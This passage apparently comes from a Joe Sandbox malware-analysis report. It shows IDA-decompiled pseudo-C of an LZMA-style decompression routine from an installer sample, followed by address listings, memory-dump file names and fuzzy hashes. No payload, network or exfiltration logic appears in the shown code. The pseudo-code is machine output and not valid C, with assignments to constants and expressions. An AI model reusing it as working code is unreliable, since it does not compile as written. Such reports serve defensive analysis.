                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                															 *__esi = __dx;
                														}
                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                														if( *(__ebp - 0x10) >= 0x1000000) {
                															L111:
                															_t368 = __ebp - 0x48;
                															 *_t368 =  *(__ebp - 0x48) + 1;
                															__eflags =  *_t368;
                															goto L112;
                														} else {
                															goto L109;
                														}
                													}
                													__ecx =  *(__ebp - 0xc);
                													__ebx = __ebx + __ebx;
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													 *(__ebp - 0x44) = __ebx;
                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                														__ecx =  *(__ebp - 0x10);
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                														__ebx = __ebx | 0x00000001;
                														__eflags = __ebx;
                														 *(__ebp - 0x44) = __ebx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L101:
                														_t338 = __ebp - 0x48;
                														 *_t338 =  *(__ebp - 0x48) - 1;
                														__eflags =  *_t338;
                														goto L102;
                													} else {
                														goto L99;
                													}
                												}
                												__edx =  *(__ebp - 4);
                												__eax = __eax - __ebx;
                												 *(__ebp - 0x40) = __ecx;
                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                												goto L108;
                											case 0x1a:
                												L56:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													 *(__ebp - 0x88) = 0x1a;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x68);
                												__al =  *(__ebp - 0x5c);
                												__edx =  *(__ebp - 8);
                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *( *(__ebp - 0x68)) = __al;
                												__ecx =  *(__ebp - 0x14);
                												 *(__ecx +  *(__ebp - 8)) = __al;
                												__eax = __ecx + 1;
                												__edx = 0;
                												_t192 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t192;
                												goto L80;
                											case 0x1b:
                												L76:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													 *(__ebp - 0x88) = 0x1b;
                													goto L170;
                												}
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t275 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t275;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												_t284 = __ebp - 0x64;
                												 *_t284 =  *(__ebp - 0x64) - 1;
                												__eflags =  *_t284;
                												 *( *(__ebp - 0x68)) = __cl;
                												L80:
                												 *(__ebp - 0x14) = __edx;
                												goto L81;
                											case 0x1c:
                												while(1) {
                													L123:
                													__eflags =  *(__ebp - 0x64);
                													if( *(__ebp - 0x64) == 0) {
                														break;
                													}
                													__eax =  *(__ebp - 0x14);
                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                													__eflags = __eax -  *(__ebp - 0x74);
                													if(__eax >=  *(__ebp - 0x74)) {
                														__eax = __eax +  *(__ebp - 0x74);
                														__eflags = __eax;
                													}
                													__edx =  *(__ebp - 8);
                													__cl =  *(__eax + __edx);
                													__eax =  *(__ebp - 0x14);
                													 *(__ebp - 0x5c) = __cl;
                													 *(__eax + __edx) = __cl;
                													__eax = __eax + 1;
                													__edx = 0;
                													_t414 = __eax %  *(__ebp - 0x74);
                													__eax = __eax /  *(__ebp - 0x74);
                													__edx = _t414;
                													__eax =  *(__ebp - 0x68);
                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                													__eflags =  *(__ebp - 0x30);
                													 *( *(__ebp - 0x68)) = __cl;
                													 *(__ebp - 0x14) = _t414;
                													if( *(__ebp - 0x30) > 0) {
                														continue;
                													} else {
                														L81:
                														 *(__ebp - 0x88) = 2;
                														goto L1;
                													}
                												}
                												 *(__ebp - 0x88) = 0x1c;
                												goto L170;
                										}
                									}
                									L171:
                									_t535 = _t534 | 0xffffffff;
                									goto L172;
                								}
                							}
                						}
                					}
                					goto L1;
                				}
                			}













                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x0040676b
                0x004066f2
                0x004066ef
                0x00000000
                0x00406444

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
                • Instruction ID: e3f6d56364c83544c85f79d99d02007aa6d07438f45ea059adc5b55077a757f2
                • Opcode Fuzzy Hash: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
                • Instruction Fuzzy Hash: 30714671D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E0040638C() {
                				unsigned short _t531;
                				signed int _t532;
                				void _t533;
                				signed int _t534;
                				signed int _t535;
                				signed int _t565;
                				signed int _t568;
                				signed int _t589;
                				signed int* _t606;
                				void* _t613;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t613 - 0x40) != 0) {
                						 *(_t613 - 0x84) = 0xa;
                						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                					} else {
                						 *(__ebp - 0x84) = 9;
                						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                					}
                					while(1) {
                						 *(_t613 - 0x54) = _t606;
                						while(1) {
                							L133:
                							_t531 =  *_t606;
                							_t589 = _t531 & 0x0000ffff;
                							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                							if( *(_t613 - 0xc) >= _t565) {
                								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                								 *(_t613 - 0x40) = 1;
                								_t532 = _t531 - (_t531 >> 5);
                								 *_t606 = _t532;
                							} else {
                								 *(_t613 - 0x10) = _t565;
                								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                							}
                							if( *(_t613 - 0x10) >= 0x1000000) {
                								goto L139;
                							}
                							L137:
                							if( *(_t613 - 0x6c) == 0) {
                								 *(_t613 - 0x88) = 5;
                								L170:
                								_t568 = 0x22;
                								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                								_t535 = 0;
                								L172:
                								return _t535;
                							}
                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                							L139:
                							_t533 =  *(_t613 - 0x84);
                							while(1) {
                								 *(_t613 - 0x88) = _t533;
                								while(1) {
                									L1:
                									_t534 =  *(_t613 - 0x88);
                									if(_t534 > 0x1c) {
                										break;
                									}
                									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
                										case 0:
                											if( *(_t613 - 0x6c) == 0) {
                												goto L170;
                											}
                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                											_t534 =  *( *(_t613 - 0x70));
                											if(_t534 > 0xe1) {
                												goto L171;
                											}
                											_t538 = _t534 & 0x000000ff;
                											_push(0x2d);
                											asm("cdq");
                											_pop(_t570);
                											_push(9);
                											_pop(_t571);
                											_t609 = _t538 / _t570;
                											_t540 = _t538 % _t570 & 0x000000ff;
                											asm("cdq");
                											_t604 = _t540 % _t571 & 0x000000ff;
                											 *(_t613 - 0x3c) = _t604;
                											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                											_t612 = (0x300 << _t604 + _t609) + 0x736;
                											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                												L10:
                												if(_t612 == 0) {
                													L12:
                													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                													goto L15;
                												} else {
                													goto L11;
                												}
                												do {
                													L11:
                													_t612 = _t612 - 1;
                													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                												} while (_t612 != 0);
                												goto L12;
                											}
                											if( *(_t613 - 4) != 0) {
                												GlobalFree( *(_t613 - 4));
                											}
                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                											 *(_t613 - 4) = _t534;
                											if(_t534 == 0) {
                												goto L171;
                											} else {
                												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                												goto L10;
                											}
                										case 1:
                											L13:
                											__eflags =  *(_t613 - 0x6c);
                											if( *(_t613 - 0x6c) == 0) {
                												 *(_t613 - 0x88) = 1;
                												goto L170;
                											}
                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                											_t45 = _t613 - 0x48;
                											 *_t45 =  *(_t613 - 0x48) + 1;
                											__eflags =  *_t45;
                											L15:
                											if( *(_t613 - 0x48) < 4) {
                												goto L13;
                											}
                											_t546 =  *(_t613 - 0x40);
                											if(_t546 ==  *(_t613 - 0x74)) {
                												L20:
                												 *(_t613 - 0x48) = 5;
                												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                												goto L23;
                											}
                											 *(_t613 - 0x74) = _t546;
                											if( *(_t613 - 8) != 0) {
                												GlobalFree( *(_t613 - 8));
                											}
                											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                											 *(_t613 - 8) = _t534;
                											if(_t534 == 0) {
                												goto L171;
                											} else {
                												goto L20;
                											}
                										case 2:
                											L24:
                											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                											 *(_t613 - 0x84) = 6;
                											 *(_t613 - 0x4c) = _t553;
                											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                											 *(_t613 - 0x54) = _t606;
                											goto L133;
                										case 3:
                											L21:
                											__eflags =  *(_t613 - 0x6c);
                											if( *(_t613 - 0x6c) == 0) {
                												 *(_t613 - 0x88) = 3;
                												goto L170;
                											}
                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                											_t67 = _t613 - 0x70;
                											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                											__eflags =  *_t67;
                											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                											L23:
                											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                											if( *(_t613 - 0x48) != 0) {
                												goto L21;
                											}
                											goto L24;
                										case 4:
                											L133:
                											_t531 =  *_t606;
                											_t589 = _t531 & 0x0000ffff;
                											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                											if( *(_t613 - 0xc) >= _t565) {
                												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                												 *(_t613 - 0x40) = 1;
                												_t532 = _t531 - (_t531 >> 5);
                												 *_t606 = _t532;
                											} else {
                												 *(_t613 - 0x10) = _t565;
                												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                											}
                											if( *(_t613 - 0x10) >= 0x1000000) {
                												goto L139;
                											}
                										case 5:
                											goto L137;
                										case 6:
                											__edx = 0;
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) = 1;
                												 *(__ebp - 0x84) = 7;
                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                												while(1) {
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											}
                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                											__esi =  *(__ebp - 0x60);
                											__cl = 8;
                											__cl = 8 -  *(__ebp - 0x3c);
                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                											__ecx =  *(__ebp - 0x3c);
                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                											__ecx =  *(__ebp - 4);
                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                											__eflags =  *(__ebp - 0x38) - 4;
                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											if( *(__ebp - 0x38) >= 4) {
                												__eflags =  *(__ebp - 0x38) - 0xa;
                												if( *(__ebp - 0x38) >= 0xa) {
                													_t98 = __ebp - 0x38;
                													 *_t98 =  *(__ebp - 0x38) - 6;
                													__eflags =  *_t98;
                												} else {
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                												}
                											} else {
                												 *(__ebp - 0x38) = 0;
                											}
                											__eflags =  *(__ebp - 0x34) - __edx;
                											if( *(__ebp - 0x34) == __edx) {
                												__ebx = 0;
                												__ebx = 1;
                												goto L61;
                											} else {
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__ecx =  *(__ebp - 8);
                												__ebx = 0;
                												__ebx = 1;
                												__al =  *((intOrPtr*)(__eax + __ecx));
                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                												goto L41;
                											}
                										case 7:
                											__eflags =  *(__ebp - 0x40) - 1;
                											if( *(__ebp - 0x40) != 1) {
                												__eax =  *(__ebp - 0x24);
                												 *(__ebp - 0x80) = 0x16;
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												__eax =  *(__ebp - 0x2c);
                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xa;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                												__eax =  *(__ebp - 4);
                												__eax =  *(__ebp - 4) + 0x664;
                												__eflags = __eax;
                												 *(__ebp - 0x58) = __eax;
                												goto L69;
                											}
                											__eax =  *(__ebp - 4);
                											__ecx =  *(__ebp - 0x38);
                											 *(__ebp - 0x84) = 8;
                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                											while(1) {
                												 *(_t613 - 0x54) = _t606;
                												goto L133;
                											}
                										case 8:
                											goto L0;
                										case 9:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												goto L89;
                											}
                											__eflags =  *(__ebp - 0x60);
                											if( *(__ebp - 0x60) == 0) {
                												goto L171;
                											}
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                											__eflags = _t258;
                											0 | _t258 = _t258 + _t258 + 9;
                											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                											goto L75;
                										case 0xa:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xb;
                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                												while(1) {
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											}
                											__eax =  *(__ebp - 0x28);
                											goto L88;
                										case 0xb:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__ecx =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x20);
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                											} else {
                												__eax =  *(__ebp - 0x24);
                											}
                											__ecx =  *(__ebp - 0x28);
                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                											L88:
                											__ecx =  *(__ebp - 0x2c);
                											 *(__ebp - 0x2c) = __eax;
                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                											L89:
                											__eax =  *(__ebp - 4);
                											 *(__ebp - 0x80) = 0x15;
                											__eax =  *(__ebp - 4) + 0xa68;
                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                											goto L69;
                										case 0xc:
                											L99:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xc;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t334 = __ebp - 0x70;
                											 *_t334 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t334;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											__eax =  *(__ebp - 0x2c);
                											goto L101;
                										case 0xd:
                											L37:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xd;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t122 = __ebp - 0x70;
                											 *_t122 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t122;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L39:
                											__eax =  *(__ebp - 0x40);
                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                												goto L48;
                											}
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												goto L54;
                											}
                											L41:
                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                											__ecx =  *(__ebp - 0x58);
                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                											 *(__ebp - 0x48) = __eax;
                											__eax = __eax + 1;
                											__eax = __eax << 8;
                											__eax = __eax + __ebx;
                											__esi =  *(__ebp - 0x58) + __eax * 2;
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edx = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												 *(__ebp - 0x40) = 1;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												__ebx = __ebx + __ebx + 1;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edx;
                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L39;
                											} else {
                												goto L37;
                											}
                										case 0xe:
                											L46:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xe;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t156 = __ebp - 0x70;
                											 *_t156 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t156;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											while(1) {
                												L48:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													break;
                												}
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t170 = __edx + 1; // 0x1
                													__ebx = _t170;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													continue;
                												} else {
                													goto L46;
                												}
                											}
                											L54:
                											_t173 = __ebp - 0x34;
                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                											__eflags =  *_t173;
                											goto L55;
                										case 0xf:
                											L58:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xf;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t203 = __ebp - 0x70;
                											 *_t203 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t203;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L60:
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												L55:
                												__al =  *(__ebp - 0x44);
                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                												goto L56;
                											}
                											L61:
                											__eax =  *(__ebp - 0x58);
